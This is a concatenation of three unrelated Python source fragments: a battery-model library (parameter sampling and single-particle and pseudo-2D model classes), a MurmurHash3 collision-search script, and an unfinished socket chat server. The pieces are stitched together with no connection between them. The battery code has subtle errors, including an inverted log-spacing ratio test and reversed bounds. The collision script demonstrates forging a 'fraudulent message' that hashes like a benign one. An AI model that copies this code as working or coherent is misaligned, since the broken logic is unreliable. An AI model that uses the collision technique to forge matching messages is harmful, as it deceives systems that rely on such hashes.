n : the number of samples to make. For sobol, this is the total number, and for grid, this is the number of
samples per grid dimension. Be careful using grid, as this can get out of hand very quickly (n^dim)
loglist: A list of parameters which should be log spaced. Log spacing is advised for any variable changing
by more than 100x, i.e. max/min > 100. If 'auto' is given, this will be detected automatically.
defaults to 'auto'.
pars: A list of parameters if desired modified parameters are different than the initialized set.
bounds: Hard upper and lower limits for generating the data. If this is not given, +/- 30% is used. If a float is given,
+/- that amount is used. Custom bounds are recommended for good results, i.e., fewer failed samples.
type: defaults to 'sobol', options include 'grid' and 'saltelli'.
distribution: defaults to 'uniform', describes the distribution of the sampling. Options include 'normal', 'uniform', and 'bi-modal'
(to be implemented)
sample_time: The times to be interpolated for sampling. Filled values will be 2.5V, in keeping with the final
discharge voltage. Defaults to linear spacing at 20% longer than t_exp
time_samples: number of points in the linear timespacing, defaults to 100.
"""
assert isinstance(filename, str), \
'Filename must be type string'
assert isinstance(n, int), \
'n must be an integer'
assert isinstance(loglist, (str, list, bool)), \
'loglist must be a list, False, or "auto"'
assert type in ['grid', 'sobol', 'saltelli', 'random'], \
'Available arguments for type are {}'.format(['grid', 'sobol', 'saltelli', 'random'])
try:
assert isinstance(self.t_exp, (np.ndarray, list)), \
't_exp must be a list of numpy arrays matching the length of currents given in initial conditions'
assert len(self.t_exp) == len(self.currents), \
'Number of currents does not match experimental data - received {} but expected {}'.format(len(self.t_exp), len(self.currents))
except AttributeError:
pass
import time
self.currents = currents
self.num_currents = len(self.currents)
if self.num_currents > 1:
print('multiple currents detected')
self.currents = sorted(self.currents, reverse=True)
self.generate_pars = None
self.n = n*self.num_currents
# step 1 - handle the arguments
if pars is None:
self.generate_pars = self.estimate_pars
self.generate_inds = self.estimate_inds
else:
self.generate_pars = pars
self.generate_inds = [i for i, x in enumerate(self.available_parameters) if x in self.generate_pars]
# self.bounds_inds = [i for i, x in enumerate(self.available_parmeters)]
assert self.generate_pars is not None
print(self.generate_inds)
# set up bounds (used for loglist)
if bounds is None:
if self.bounds is None:
self.bounds = [(x/1.2, x*1.2) for x in self.initial[self.generate_inds]]
else:
d1 = dict(zip(pars,range(len(pars))))
bounds_inds = [d1[i] for i in [self.available_parameters[j] for j in self.generate_inds]]
self.bounds = [bounds[i] for i in bounds_inds]
# set up log-spacing
if loglist is False:
self.loglist = np.zeros(len(self.generate_pars))
if isinstance(loglist, list):
assert len(loglist) == len(self.generate_pars), \
'expected loglist to be same length as generate_pars, \
but got {} and {}'.format(len(loglist), len(self.generate_pars))
self.loglist = loglist
if loglist == 'auto':
self.loglist = [1 if x[0]/x[1] >= 100 else 0 for x in self.bounds]
# create the array using the spacing method of choice
self.raw_sample = None
if type == 'sobol':
from sobol_seq import i4_sobol_generate
self.raw_sample = i4_sobol_generate(len(self.generate_pars),
self.n)
elif type == 'saltelli':
from SALib.sample import saltelli
problem = {'names': self.estimate_pars,
'bounds': [[0, 1] for x in self.estimate_pars],
'num_vars': len(self.estimate_pars)}
self.raw_sample = saltelli.sample(problem, self.n, True)
elif type == 'grid':
from sklearn.utils.extmath import cartesian
temp = np.linspace(0, 1, self.n)
self.raw_sample = cartesian([temp for i in range(len(self.generate_pars))])
elif type == 'random':
self.raw_sample = np.random.random((n,len(self.generate_pars)))
assert self.raw_sample is not None, \
'something went wrong - check that type is correct'
print('expected shape is {}'.format(self.raw_sample.shape))
# map the raw array to bounds, adhering to log scaling rules
self.scaled_sample = self.log_scale_matrix(self.raw_sample)
if just_sample:
return [None, self.scaled_sample]
else:
outs = []
ins = []
self.failed=[]
count = 0
for i in self.currents:
for parameter_set in self.scaled_sample:
simulate_pars = np.copy(self.initial)
simulate_pars[self.generate_inds] = self.log_descale_for_model(parameter_set)
# print(simulate_pars)
try:
if i > 0:
outs.append(self.discharge(current=i, p=simulate_pars, internal=internal)[1])
else:
outs.append(self.charge(current=-1*i, p=simulate_pars, internal=internal)[1])
ins.append(self.log_descale_for_model(parameter_set))
except IndexError:
self.failed.append(simulate_pars)
# outs.append(self.)
# outs.append([])
# # outs = np.zeros((self.generate_time.shape[0], time_samples))
# # ins = np.zeros(self.generate_time.shape[0], len(self.generate_inds))
# # print(self.scaled_sample)
# # print(self.generate_time)
# count = 0
# st = time.time()
# self.currents = sorted(self.currents)
# self.failed = []
# for parameter_set in self.scaled_sample:
# try:
# succ = 0
# # reverse the list because high currents tend to fail more frequently,
# # and we want it to fail first if it's going to fail.
# for i, curr in enumerate(self.currents[::-1]):
#
# current_pars = np.copy(self.initial)
# current_pars[self.generate_inds] = self.log_descale_for_model(parameter_set)
# current_pars[self.curr_index] = curr
# # print(current_pars)
# outs[i].append(self.model(current_pars, self.generate_time[i]))
# succ += 1
# ins.append(parameter_set)
# except (ValueError, IndexError):
# # if self.verbose:
# # print('failed - ', current_pars, count)
# self.failed.append([current_pars, count])
# if succ != 0:
# for i in range(succ):
# outs[i].pop()
# count += 1
# if count == 20:
# print('{} solutions completed of {} in {} seconds - {} total hours predicted'.format(count, self.scaled_sample.shape[0], time.time()-st, (time.time()-st)/3600/(count/self.scaled_sample.shape[0])))
# if count % (self.scaled_sample.shape[0]//20) == 0 and self.verbose:
# print('{} solutions completed of {} in {} seconds - {} total hours predicted'.format(count, self.scaled_sample.shape[0], time.time()-st, (time.time()-st)/3600/(count/self.scaled_sample.shape[0])))
#
# # save the values to an h5 file
# outs = [np.array(out) for out in outs]
# ins = np.array(ins)
# self.raw_outs = outs
#
# outs2 = []
# for i in range(len(outs[0])):
# outs2.append([x[i] for x in outs])
# outs2 = np.array(outs2)
# outs = outs2.reshape(outs2.shape[0], -1)
#
# # break into test and train splits
# inds = np.arange(outs.shape[0])
# np.random.shuffle(inds)
# train = inds[:outs.shape[0]*3//4]
# test = inds[outs.shape[0]*3//4:]
# #
# x = outs[train]
# xt = outs[test]
# y = ins[train]
# yt = ins[test]
# self.outs = outs
# self.ins = ins
# self.create_database(x, y, xt, yt, filename)
# if summary:
# print("""A total of {} parameter combinations were evaluated. Of
# these, {} failed, representing {} percent. These values can be
# found at object.failed""".format(len(self.scaled_sample), len(self.failed), len(self.failed)/len(self.scaled_sample)*100))
return [outs, ins]
def create_database(self, x, y, xt, yt, filename):
"""This function creates a dataset using pre-split data and saves it
into a compressed h5 file with name filename. x, y, xt, yt are assumed
to be numpy arrays."""
import h5py
with h5py.File(filename+".hdf5", "w") as f:
f.create_dataset('x', data=x, compression='gzip')
f.create_dataset('xt', data=xt, compression='gzip')
f.create_dataset('y', data=y, compression='gzip')
f.create_dataset('yt', data=yt, compression='gzip')
return
def abscale(self, matrix, a=-1, b=1):
out = 0
if matrix.shape == (matrix.shape[0],):
matrix = matrix.reshape(-1, 1)
out = 1
new = np.zeros(matrix.shape)
for i in range(matrix.shape[1]):
new[:, i] = (b-a)*(matrix[:, i]-matrix[:, i].min())/(matrix[:, i].max()-matrix[:, i].min())+a
if out == 0:
return new
else:
return new[:, 0]
def log_scale_matrix(self, matrix):
"""This function is used to resample the sampling methods into log
space, if the value in loglist is a 1."""
out = np.zeros(matrix.shape)
for i in range(len(self.loglist)):
if self.loglist[i] == 1:
ub = np.log(self.bounds[i][1])
lb = np.log(self.bounds[i][0])
out[:, i] = self.abscale(matrix[:, i], ub, lb)
else:
ub = self.bounds[i][1]
lb = self.bounds[i][0]
out[:, i] = self.abscale(matrix[:, i], ub, lb)
return out
def log_descale_for_model(self, matrix):
"""This function takes in a matrix that has been log scaled and
turns the log values back into normal values to pass to the model."""
out = np.zeros(matrix.shape)
for i in range(len(self.loglist)):
if self.loglist[i] == 1:
out[i] = np.exp(matrix[i])
else:
out[i] = matrix[i]
return out
def demonstrate_convergence(self, function):
'''This function seeks to demonstrate grid independence for the given
charge / discharge pattern. It will continue doubling the number of nodes
in each region until the absolute error between subsequent discharges is less than 1e-6,
giving an error if that does not occur.
Parameters
----------
function: A string describing the desired test
Outputs
-------
Error as a function of nodes, as well as the minimum number of nodes needed
for grid independence, or numerical convergence, at these conditions.
'''
self.initial_discretization = self.initial[25:]
self.nodes = []
self.errors = []
print(self.initial_discretization)
for i in range(1,10):
self.nodes.append(self.initial_discretization*i)
class SingleParticleParabolic(BaseBattery):
"""An implementation of the Single Particle Model, solved with IDA. This
version supports CC-discharge, CC-CV charging, and access to the internal
states of the battery. It also allows for sequential cycling. """
def __init__(self, initial_parameters=None, verbose=False, **kwargs):
"""Constructor for the Single Particle Model base class
Parameters
----------
initial_parameters: A dictionary of parameter names and values. Acceptable names for the
parameters can be found below:
| name | description | default value | Units |
|--------|---------------------------------------------|---------------|-----------------|
| Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
| Dp | Li+ Diffusivity in positive particle | 1e-14 | cm^2/s |
| Rn | Negative particle radius | 2e-6 | m |
| Rp | Positive particle radius | 2e-6 | m |
| T | Ambient Temperature | 303.15 | K |
| an | Surface area of negative electrode | 723600 | m^2/m^3 |
| ap | Surface area of positive electrode | 885000 | m^2/m^3 |
| ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
| csnmax | Maximum Li+ concentration of negative solid | 30555 | mol/m^3 |
| cspmax | Maximum Li+ concentration of positive solid | 51555 | mol/m^3 |
| kn | Negative electrode reaction rate | 5.0307e-9 |m^2.5/(mol^0.5s) |
| kp | Positive electrode reaction rate | 2.334e-9 |m^2.5/(mol^0.5s) |
| ln | Negative electrode thickness | 88e-6 | m |
| lp | Positive electrode thickness | 80e-6 | m |
estimate_parameters: A list of strings representing the parameters that you wish to estimate.
Defaults to None, which will allow for the estimation of all parameters except temperature.
For both intiial_parameters and estimate_parameters, order does not matter.
Example usage:
spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
A list of available keyword agruments (kwargs):
"""
from .numerical import SPM_par
from .fitting import rmse
super().__init__(initial_parameters, **kwargs)
self.model = SPM_par
self.opt = self.opt_wrap
self.verbose = verbose
self.initial_fit = 0
# self.inplace = np.zeros((10000,8))
self.available_parameters = ['Dn','Dp','Rn','Rp','T','an','ap','ce','csnmax','cspmax','kn','kp','ln','lp']
self.default_values = [3.9e-14, 1e-14, 2e-6, 2e-6, 303.15, 723600, 885000, 1000, 30550, 51555, 5.0307e-9, 2.334e-9, 88e-6, 80e-6]
self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
if initial_parameters is not None:
for key in initial_parameters.keys():
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid initial key entered - double check %s" % str(key)
for key in initial_parameters.keys():
self.initial_parameters[key] = initial_parameters[key]
# initial enforces the order parameters are given to the model
self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
if self.estimate_parameters is not None:
for key in self.estimate_parameters:
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid estimate key entered - double check %s" % str(key)
self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
else:
self.estimate_inds = list(range(len(self.initial)))
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
self.charge_ICs = [4.95030611e+04, 3.05605527e+02, 4.93273985e+04, 3.55685791e+02, 3.78436346e+00, 7.86330739e-01, 1.00000000e+00]
self.discharge_ICs = [2.51584754e+04, 2.73734963e+04, 2.51409091e+04, 2.73785043e+04, 4.26705391e+00, 6.70539113e-02, -1.00000000]
self.hist = []
class SingleParticleFDSEI(BaseBattery):
"""An Finite Difference implementation of the Single Particle Model with SEI, solved with IDA. This
version supports CC-discharge, CC-CV charging, and access to the internal
states of the battery. It also allows for sequential cycling. See .charge, .discharge,
.cycle, and .piecewise_current for more."""
def __init__(self, initial_parameters=None, verbose=False, **kwargs):
"""Constructor for the Single Particle Model base class
Parameters
----------
initial_parameters: A dictionary of parameter names and values. Acceptable names for the
parameters can be found below:
| name | description | default value | Units |
|-----------|-----------------------------------------------|---------------|------------------|
| Dp | Li+ Diffusivity in positive particle | 3.9e-14 | cm^2/s |
| Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
| cspmax | Maximum Li concentration of positive solid | 30555 | mol/m^3 |
| csnmax | Maximum Li concentration of negative solid | 30555 | mol/m^3 |
| lp | Positive electrode thickness | 80e-6 | m |
| ln | Negative electrode thickness | 88e-6 | m |
| Rp | Positive particle radius | 2e-6 | m |
| Rn | Negative particle radius | 2e-6 | m |
| T | Ambient Temperature | 303.15 | K |
| ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
| ap | Surface area of positive electrode per volume | 885000 | m^2/m^3 |
| an | Surface area of negative electrode per volume | 723600 | m^2/m^3 |
| M_sei | Molecular weight of SEI | 0.026 | Kg/mol |
| rho_sei | SEI Density | 2.1e3 | Kg/m^3 |
| Kappa_sei | SEI Ionic conductivity | 1 | S/m |
| k_sei | rate constant of side reaction | 1.5e-6 | C m/(mol*s) |
| kp | Positive electrode reaction rate | 2.334e-9 | m^2.5/(mol^0.5s) |
| kn | Negative electrode reaction rate | 5.0307e-9 | m^2.5/(mol^0.5s) |
| N1 | Number of FD nodes in positive particle | 15 | |
| N2 | Number of FD nodes in negative particle | 15 | |
estimate_parameters: A list of strings representing the parameters that you wish to estimate.
Defaults to None, which will allow for the estimation of all parameters except temperature.
For both intiial_parameters and estimate_parameters, order does not matter.
Example usage:
spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
A list of available keyword agruments (kwargs):
"""
from .numerical import SPM_fd_sei
from .fitting import rmse
super().__init__(initial_parameters, **kwargs)
self.model = SPM_fd_sei
self.opt = self.opt_wrap
self.verbose = verbose
self.initial_fit = 0
TC = 30
# self.inplace = np.zeros((10000,8))
self.available_parameters = ['Dp','Dn','cspmax','csnmax','lp','ln','Rp','Rn','T','ce','ap','an','M_sei','rho_sei','Kappa_sei','kp','kn','ksei','N1','N2']
self.default_values = [1e-14, 1e-14, 51555.0, 30555.0, 8e-05, 8.8e-05, 2e-06, 2e-06, 303.15, 1000.0, 885000.0, 723600.0, 0.026, 2100.0, 1.0, 2.334e-11, 8.307e-12, 1.5e-06, 30, 30]
self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
if initial_parameters is not None:
for key in initial_parameters.keys():
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid initial key entered - double check %s" % str(key)
for key in initial_parameters.keys():
self.initial_parameters[key] = initial_parameters[key]
# initial enforces the order parameters are given to the model
self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
if self.estimate_parameters is not None:
for key in self.estimate_parameters:
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid estimate key entered - double check %s" % str(key)
self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
else:
self.estimate_inds = list(range(len(self.initial)))
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
self.charge_ICs = []
N1 = int(self.initial[18])
N2 = int(self.initial[19])
for i in range(N1+2):
self.charge_ICs.append(49503.111)
for i in range(N1+2, N1+N2+4):
self.charge_ICs.append(305.55)
self.charge_ICs.append(3.67873289259766) #phi_p
self.charge_ICs.append(.182763748093840) #phi_n
self.charge_ICs.append(30) #iint
self.charge_ICs.append(0) #isei
self.charge_ICs.append(1e-10) #delta_sei
self.charge_ICs.append(0) #Q
self.charge_ICs.append(0) #cm
self.charge_ICs.append(0) #cf
self.charge_ICs.append(3.0596914450382) #pot
self.charge_ICs.append(TC*1) #it
# self.charge_ICs = [4.95030611e+04, 3.05605527e+02, 4.93273985e+04, 3.55685791e+02, 3.78436346e+00, 7.86330739e-01, 1.00000000e+00]
self.discharge_ICs=[]
for i in range(N1+2):
self.discharge_ICs.append(2.51417672e+04)
for i in range(N1+2, N1+N2+4):
self.discharge_ICs.append(2.73921225e+04)
self.discharge_ICs.append(4.26700382e+00)
self.discharge_ICs.append(6.70038247e-02)
self.discharge_ICs.append(2.65295200e-03)
self.discharge_ICs.append(7.34704800e-03)
self.discharge_ICs.append(1.63513920e-10)
self.discharge_ICs.append(3.08271510e+01)
self.discharge_ICs.append(3.08183958e+01)
self.discharge_ICs.append(8.75512593e-03)
self.discharge_ICs.append(4.20000000e+00)
self.discharge_ICs.append(1.00000000e-02)
# self.discharge_ICs = [2.51584754e+04, 2.73734963e+04, 2.51409091e+04, 2.73785043e+04, 4.26705391e+00, 6.70539113e-02, -1.00000000]
self.hist = []
class SingleParticleFD(BaseBattery):
"""An Finite Difference implementation of the Single Particle Model with SEI, solved with IDA. This
version supports CC-discharge, CC-CV charging, and access to the internal
states of the battery. It also allows for sequential cycling. See .charge, .discharge,
.cycle, and .piecewise_current for more."""
def __init__(self, initial_parameters=None, verbose=False, **kwargs):
"""Constructor for the Single Particle Model base class
Parameters
----------
initial_parameters: A dictionary of parameter names and values. Acceptable names for the
parameters can be found below:
| name | description | default value | Units |
|-----------|-----------------------------------------------|---------------|------------------|
| Dp | Li+ Diffusivity in positive particle | 3.9e-14 | cm^2/s |
| Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
| cspmax | Maximum Li concentration of positive solid | 30555 | mol/m^3 |
| csnmax | Maximum Li concentration of negative solid | 30555 | mol/m^3 |
| lp | Positive electrode thickness | 80e-6 | m |
| ln | Negative electrode thickness | 88e-6 | m |
| Rp | Positive particle radius | 2e-6 | m |
| Rn | Negative particle radius | 2e-6 | m |
| T | Ambient Temperature | 303.15 | K |
| ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
| ap | Surface area of positive electrode per volume | 885000 | m^2/m^3 |
| an | Surface area of negative electrode per volume | 723600 | m^2/m^3 |
| kp | Positive electrode reaction rate | 2.334e-9 | m^2.5/(mol^0.5s) |
| kn | Negative electrode reaction rate | 5.0307e-9 | m^2.5/(mol^0.5s) |
| N1 | Number of FD nodes in positive particle | 15 | |
| N2 | Number of FD nodes in negative particle | 15 | |
estimate_parameters: A list of strings representing the parameters that you wish to estimate.
Defaults to None, which will allow for the estimation of all parameters except temperature.
For both intiial_parameters and estimate_parameters, order does not matter.
Example usage:
spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
A list of available keyword agruments (kwargs):
"""
from .numerical import SPM_fd
from .fitting import rmse
super().__init__(initial_parameters, **kwargs)
self.model = SPM_fd
self.opt = self.opt_wrap
self.verbose = verbose
self.initial_fit = 0
TC = 30
# self.inplace = np.zeros((10000,8))
self.available_parameters = ['Dp','Dn','cspmax','csnmax','lp','ln','Rp','Rn','T','ce','ap','an','kp','kn','N1','N2']
self.default_values = [1e-14, 1e-14, 51555.0, 30555.0, 8e-05, 8.8e-05, 2e-06, 2e-06, 303.15, 1000.0, 885000.0, 723600.0, 2.334e-11, 8.307e-12, 30, 30]
self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
if initial_parameters is not None:
for key in initial_parameters.keys():
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid initial key entered - double check %s" % str(key)
for key in initial_parameters.keys():
self.initial_parameters[key] = initial_parameters[key]
# initial enforces the order parameters are given to the model
self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
if self.estimate_parameters is not None:
for key in self.estimate_parameters:
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid estimate key entered - double check %s" % str(key)
self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
else:
self.estimate_inds = list(range(len(self.initial)))
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
self.charge_ICs = []
N1 = int(self.initial[14])
N2 = int(self.initial[15])
for i in range(N1+2):
self.charge_ICs.append(49503.111)
for i in range(N1+2, N1+N2+4):
self.charge_ICs.append(305.55)
self.charge_ICs.append(3.67873289259766) #phi_p
self.charge_ICs.append(.182763748093840) #phi_n
self.charge_ICs.append(3.0596914450382) #pot
self.charge_ICs.append(TC*1) #it
# self.charge_ICs = [4.95030611e+04, 3.05605527e+02, 4.93273985e+04, 3.55685791e+02, 3.78436346e+00, 7.86330739e-01, 1.00000000e+00]
self.discharge_ICs=[]
for i in range(N1+2):
self.discharge_ICs.append(25817.37)
for i in range(N1+2, N1+N2+4):
self.discharge_ICs.append(26885.03)
self.discharge_ICs.append(4.246347)
self.discharge_ICs.append(0.046347)
self.discharge_ICs.append(4.20000000e+00)
self.discharge_ICs.append(1.00000000e-02)
# self.discharge_ICs = [2.51584754e+04, 2.73734963e+04, 2.51409091e+04, 2.73785043e+04, 4.26705391e+00, 6.70539113e-02, -1.00000000]
self.hist = []
class PseudoTwoDimFD(BaseBattery):
"""An Finite Difference implementation of the Single Particle Model with SEI, solved with IDA. This
version supports CC-discharge, CC-CV charging, and access to the internal
states of the battery. It also allows for sequential cycling. See .charge, .discharge,
.cycle, and .piecewise_current for more."""
def __init__(self, initial_parameters=None, verbose=False, **kwargs):
"""Constructor for the Single Particle Model base class
Parameters
----------
initial_parameters: A dictionary of parameter names and values. Acceptable names for the
parameters can be found below:
| name | description | default value | Units |
|-----------|-----------------------------------------------|---------------|------------------|
| Dp | Li+ Diffusivity in positive particle | 3.9e-14 | cm^2/s |
| Dn | Li+ Diffusivity in negative particle | 3.9e-14 | cm^2/s |
| cspmax | Maximum Li concentration of positive solid | 30555 | mol/m^3 |
| csnmax | Maximum Li concentration of negative solid | 30555 | mol/m^3 |
| lp | Positive electrode thickness | 80e-6 | m |
| ln | Negative electrode thickness | 88e-6 | m |
| Rp | Positive particle radius | 2e-6 | m |
| Rn | Negative particle radius | 2e-6 | m |
| T | Ambient Temperature | 303.15 | K |
| ce | Starting electrolyte Li+ concentration | 1000 | mol/m^3 |
| ap | Surface area of positive electrode per volume | 885000 | m^2/m^3 |
| an | Surface area of negative electrode per volume | 723600 | m^2/m^3 |
| kp | Positive electrode reaction rate | 2.334e-9 | m^2.5/(mol^0.5s) |
| kn | Negative electrode reaction rate | 5.0307e-9 | m^2.5/(mol^0.5s) |
| N1 | Number of FD nodes in positive particle | 15 | |
| N2 | Number of FD nodes in negative particle | 15 | |
estimate_parameters: A list of strings representing the parameters that you wish to estimate.
Defaults to None, which will allow for the estimation of all parameters except temperature.
For both intiial_parameters and estimate_parameters, order does not matter.
Example usage:
spm = SingleParticle(initial_parameters=dictionary_of_parameter_label_value_pairs, est_pars=list_of_parameter_labels)
A list of available keyword agruments (kwargs):
"""
from .numerical import P2D_fd
from .fitting import rmse
super().__init__(initial_parameters, **kwargs)
self.model = P2D_fd
self.opt = self.opt_wrap
self.verbose = verbose
self.initial_fit = 0
self.discretized = True
# TC = 30
# self.inplace = np.zeros((10000,8))
self.available_parameters = ['D1','Dsn','Dsp','Rpn','Rpp','Temp','brugn','brugp','brugs','c0','ctn','ctp','efn','efp','en','ep','es','kn','kp','ln','lp','ls','sigman','sigmap','t1','N1','N2','N3','Nr1','Nr2']
self.default_values = [.15e-8, .72e-13, .75e-13, .10e-4, .8e-5, 298.15, 1.5, 1.5, 1.5, 1200, 30555, 45829., .3260e-1,.025, .38, .4, .45, .10307e-9, .1334e-9, .465e-4, .43e-4, .16e-4, 100, 10, .363, 7, 3, 7, 3, 3]
self.initial_parameters = dict(zip(self.available_parameters, self.default_values))
if initial_parameters is not None:
for key in initial_parameters.keys():
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid initial key entered - double check %s" % str(key)
for key in initial_parameters.keys():
self.initial_parameters[key] = initial_parameters[key]
# initial enforces the order parameters are given to the model
self.initial = np.array([self.initial_parameters[i] for i in self.available_parameters])
if self.estimate_parameters is not None:
for key in self.estimate_parameters:
assert set({key}).issubset(self.initial_parameters.keys()),\
"Invalid estimate key entered - double check %s" % str(key)
self.estimate_inds = [i for i, p in enumerate(self.available_parameters) if p in self.estimate_parameters]
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
else:
self.estimate_inds = list(range(len(self.initial)))
if self.verbose:
print(self.estimate_parameters, self.estimate_inds)
N1 = int(self.initial[25])
N2 = int(self.initial[26])
N3 = int(self.initial[27])
Nr1 = int(self.initial[28])
Nr2 = int(self.initial[29])
self.charge_ICs = []
for i in range(N1+N2+N3+4):
self.charge_ICs.append(1.0)
for i in range(N1+N2+N3+3):
self.charge_ICs.append(-.787E-2+.03E-2*i)
self.charge_ICs.append(0.0)
for i in range(N1+2):
self.charge_ICs.append(2.899)
for i in range(N3+2):
self.charge_ICs.append(0.09902)
for i in range(N3*(Nr2+1)):
self.charge_ICs.append(0.22800075826244027)
for i in range(N3):
self.charge_ICs.append(0.21325933957011173)
for i in range(N1*(Nr1+1)):
self.charge_ICs.append(0.9532086891149233)
for i in range(N1):
self.charge_ICs.append(0.9780166774057617)
self.charge_ICs.append(2.8)
self.charge_ICs.append(-17.1)
# initialize the discharge ICs
self.discharge_ICs = []
for i in range(N1+N2+N3+4):
self.discharge_ICs.append(0.99998+2e-6*i)
for i in range(N1+N2+N3+3):
self.discharge_ICs.append(-.3447E-2+.01E-2*i)
self.discharge_ICs.append(0.0)
for i in range(N1+2):
self.discharge_ICs.append(0.422461225901562E1)
for i in range(N3+2):
self.discharge_ICs.append(0.822991162960124E-1)
for i in range(N3*(Nr2+1)):
self.discharge_ICs.append(0.986699999999968)
for i in range(N3):
self.discharge_ICs.append(0.977101677061948)
for i in range(N1*(Nr1+1)):
self.discharge_ICs.append(0.424)
for i in range(N1):
self.discharge_ICs.append(0.431)
self.discharge_ICs.append(4.2)
self.discharge_ICs.append(-17.1)
self.hist = []
|
import mmh3
import sys
def add_one_to_each(item, queue, big_list):
for i in range(0, len(item)):
item[i] += 1
queue.append(list(item))
big_list.append(list(item))
item[i] -= 1
def generate_variations(message, m_list, num_variations):
split_list = message.split()
queue = []
big_list = []
m_list = [1] * len(split_list)
queue.append(m_list)
big_list.append(m_list)
while(len(big_list) < num_variations):
add_one_to_each(queue.pop(0), queue, big_list)
print "finished generating variations!"
print "compiling messages:"
word_list = []
for i in range(0, len(big_list)):
msg = ""
if i % 500000 == 0 and i > 0:
print "compiled", i, "messages"
for j in range(0, len(big_list[i])):
msg += big_list[i][j] * " "
msg += split_list[j]
word_list.append(msg)
print "finished compiling", num_variations, "messages"
return word_list
message1 = "More efficient attacks are possible by employing cryptanalysis to specific hash functions. When a collision attack is discovered and is found to be faster than a birthday attack, a hash function is often denounced as \"broken\". The NIST hash function competition was largely induced by published collision attacks against two very commonly used hash functions, MD5 and SHA-1. The collision attacks against MD5 have improved so much that, as of 2007, it takes just a few seconds on a regular computer. Hash collisions created this way are usually constant length and largely unstructured, so cannot directly be applied to attack widespread document formats or protocols."
message2 = "This is a fraudulent message. This is a fraudulent message. This is a fraudulent message."
m_list1 = []
m_list2 = []
print "MESSAGE 1 IS:", message1
print ""
print "generating variations of message 1..."
word_list_1 = generate_variations(message1, m_list1, int(sys.argv[1]))
print ""
print "MESSAGE 2 IS:", message2
print ""
print "generating variations of message 2..."
word_list_2 = generate_variations(message2, m_list2, int(sys.argv[1]))
print "\ncomparing hashes..."
hashes = {}
for i in range(0, len(word_list_1)):
h = mmh3.hash(word_list_1[i])
hashes[str(h)] = i
for i in range(0, len(word_list_2)):
h = mmh3.hash(word_list_2[i])
if str(h) in hashes:
print "\nCOLLISION FOUND!!!\n"
print "MESSAGE:", "\"" + word_list_1[hashes[str(h)]] + "\""
print "HASH:", mmh3.hash(word_list_1[hashes[str(h)]])
print ""
print "MESSAGE:", "\"" + word_list_2[i] + "\""
print "HASH:", mmh3.hash(word_list_2[i])
exit()
print "NO COLLISION FOUND"
|
import select
import socket
from threading import Thread
from authenticate import Authenticate
from connection import Connection
from connection_state import ConnectionState
from connections import Connections
from const import Consts
from protocol import ProtoLogin, ProtoBroadcast
from user import User
from users import Users
class Server(object):
def __init__(self, ip, port):
self.ip = ip
self.port = port
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.bind((self.ip, self.port))
self.server.listen(Consts.MAX_SERVER_LISTEN)
self.thread_accept = None
self.thread_data = None
self.thread_manage = None
self.users = Users(default_initialization=True)
self.authenticate = Authenticate(self.users)
self.connections = Connections()
# [1,2,3,4,5,6,7,8,9,10] (O(n))
# {'1': 1, ... , '9': 9 } (O(1))
def start(self):
thread_accept = Thread(target=self._handle_accept)
thread_accept.start()
thread_data = Thread(target=self._handle_data)
thread_data.start()
thread_manage = Thread(target=self._handle_manage)
thread_manage.start()
thread_manage.join()
print('Exit unimplemented')
exit(1)
def _connection_login(self, msg, origin):
# TODO: validate this is a valid json
login = ProtoLogin.from_json(msg)
if not hasattr(login, 'username'):
# TODO: or maybe just send a regular json response
origin.send(b'0')
return
if not hasattr(login, 'password'):
# TODO: or maybe just send a regular json response
origin.send(b'0')
return
user = self.authenticate.authenticate(login.username, login.password)
if isinstance(user, User):
origin.state = ConnectionState.BROADCAST
origin.user = user
# TODO: refactor later (maybe use status_codes.py)
# TODO: or maybe just send a regular json response
origin.send(b'1')
else:
origin.send(b'0')
def _connection_broadcast(self, msg, origin):
broadcast = ProtoBroadcast.from_json(msg)
if not hasattr(broadcast, 'username'):
# TODO: or maybe just send a regular json response
origin.send(b'0')
return
if not hasattr(broadcast, 'content'):
# TODO: or maybe just send a regular json response
origin.send(b'0')
return
if broadcast.username == origin.user.username:
connections = list(self.connections.get_connections())
for connection in connections:
if connection == origin:
continue
# TODO: Might throw exception if the socket was closed already *race*
connection.send(msg)
def _handle_accept(self):
while True:
sock, (ip, port) = self.server.accept()
connection = Connection(sock)
self.connections.add(connection)
print('New client: from {}:{}'.format(ip, port))
def _handle_data(self):
while True:
# TODO: Might race if not (list)
socks = list(self.connections.get_socks())
# TODO: might race login & broadcast messages
